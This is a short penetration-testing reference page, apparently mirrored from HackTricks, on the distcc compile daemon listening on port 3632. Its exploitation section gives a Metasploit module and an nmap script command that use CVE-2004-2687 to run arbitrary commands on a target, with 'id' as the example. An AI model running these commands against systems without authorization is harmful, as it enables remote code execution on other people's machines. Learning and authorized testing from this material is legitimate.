mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-28 05:53:52 +00:00
32 lines
1,005 B
Markdown
32 lines
1,005 B
Markdown
# 3632 - Pentesting distcc
|
|
|
|
## Basic Information
|
|
|
|
Distcc is designed to speed up compilation by taking advantage of unused processing power on other computers. A machine with distcc installed can send code to be compiled across the network to a computer which has the distccd daemon and a compatible compiler installed
|
|
|
|
**Default port:** 3632
|
|
|
|
```
|
|
PORT STATE SERVICE
|
|
3632/tcp open distccd
|
|
```
|
|
|
|
## Exploitation
|
|
|
|
Check if it's vulnerable to **CVE-2004-2687** to execute arbitrary code:
|
|
|
|
```bash
|
|
msf5 > use exploit/unix/misc/distcc_exec
|
|
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
|
|
```
|
|
|
|
## Shodan
|
|
|
|
_I don't think shodan detects this service._
|
|
|
|
## Resources
|
|
|
|
* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)
|
|
* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
|
|
|
|
Post created by **Álex B (@r1p)**
|